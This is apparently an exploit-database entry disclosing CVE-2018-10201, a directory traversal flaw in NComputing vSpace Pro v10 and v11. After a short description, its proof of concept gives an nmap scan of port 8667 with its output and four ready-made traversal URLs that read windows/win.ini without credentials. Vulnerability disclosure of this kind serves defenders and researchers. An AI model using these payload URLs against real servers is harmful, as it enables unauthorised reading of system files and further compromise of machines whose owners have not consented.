# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability# Date: 2018-04-20# Software Vendor: NComputing# Software Link: # Author: Javier Bernardo# Contact: javier@kwell.net# Website: http://www.kwell.net# CVE: CVE-2018-10201# Category: Webapps#[Description]##It is possible to read arbitrary files outside the root directory of#the web server. This vulnerability could be exploited remotely by a#crafted URL without credentials, with …/ or …\ or …./ or ….\ as a#directory-traversal pattern to TCP port 8667.##An attacker can make use of this vulnerability to step out of the root#directory and access other parts of the file system. This might give#the attacker the ability to view restricted files, which could provide#the attacker with more information required to further compromise the system.#[PoC]
nmap -p T:8667 -Pn your_vSpace_server
Nmap scan report for your_vSpace_server (x.x.x.x)
Host is up (0.044s latency).
PORT STATE SERVICE
8667/tcp openunknown
http://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini
http://your_vSpace_server:8667/...\...\...\...\...\...\...\...\...\windows\win.ini
http://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini
http://your_vSpace_server:8667/....\....\....\....\....\....\....\....\....\windows\win.ini
